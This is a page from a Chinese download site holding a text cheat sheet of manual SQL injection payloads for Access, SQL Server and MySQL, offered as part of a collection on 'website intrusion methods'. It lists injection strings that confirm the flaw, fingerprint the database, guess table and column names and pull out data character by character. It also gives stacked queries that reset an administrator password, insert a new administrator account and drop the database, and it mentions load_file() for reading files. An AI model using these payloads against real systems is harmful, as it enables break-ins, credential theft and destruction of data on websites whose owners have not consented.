⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 get方式手工注入.txt

📁 常用网站入侵方法总结。详细而且使用.学习入侵必看
💻 TXT
字号:
ACCESS


一、判断漏洞

and 1=1/or 1=2

and 1=2/or 1=1

二、判断数据库

and/or user>0

如果为ACCESS, 返回中含“Microsoft JET Database”;如果为MSSQL,返回中含“SQL Sever”。

三、猜解表名

and/or exists (select * from 表名) 或 and exists (select count from 表名)

四、猜解列名

and/or exists(select 列名 from 表名) 或 and exists (select count(列名) from 表名)

五、猜解列长度

and/or (select top 1 len(列名) from 表名)>x x为数字,指列长度

变换top后数字可猜解第N行长度

六、猜解列内容

and/or (select top 1 asc(mid(列名,列数N,1))from 表名)>x x为ASCII码



SQL Server


一、判断漏洞

and/or 1=1

and/or 1=2

'

二、判断数据库、确定当前数据库用户名及判断当前用户权限

and/or user>0

如果为MSSQL,返回中含“SQL Sever”; nvarchar的值为用户名 ; 如为sa登陆,返回的错误提示是将“dbo”转化为int,而非“sa”

猜解用户信息

group by 用户信息(即表名.列名) having 1=1--

三、随意暴当前表中列

and/or (select top 1 name from (select top N id,name from sysobjects where xtype=char(85)) T order by id desc)>1

N为数据库第N个表

四、暴数据库数据

and/or (select top 1 列名 from 表名 where id=N)>1

N代表第N条数据

五、密码MD5破解失败之后

改管理员密码

;update 表名 set 列名='内容' where 条件

新添管理员

;insert into 表名 values (内容)--

删除数据库

;drop database script script为数据库名称



MySQL


一、判断漏洞

and/or 1=1

and/or 1=2

二、判断后台数据库

/*

三、判断数据库版本(版本4及以上可使用联合查询union)

and/or ord(mid(version(),1,1))>51/*

返回正常则大于4.0

四、确定数据库字段数目

①union select 1,1,1及类似句子,不断增加1的个数

②order N 不断变换数字N

五、获得当前数据库表名

union select 字段数 from 表名

若有三个字段, 即 union select 1,2,3 from 表名

得到页面数字后替换字段名

如 union select 1,admin,3,version() from admin

若猜第N条字段,则在后面加 where id=N id 为管理员编号

六、判断是否为root权限

and/or ord(mid(user(),1,1))=114/*

七、判断是否有读写权限

and/or (select count(*) from MySQL.user)>0

或将函数名load_file()替换如union查询的数字 

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -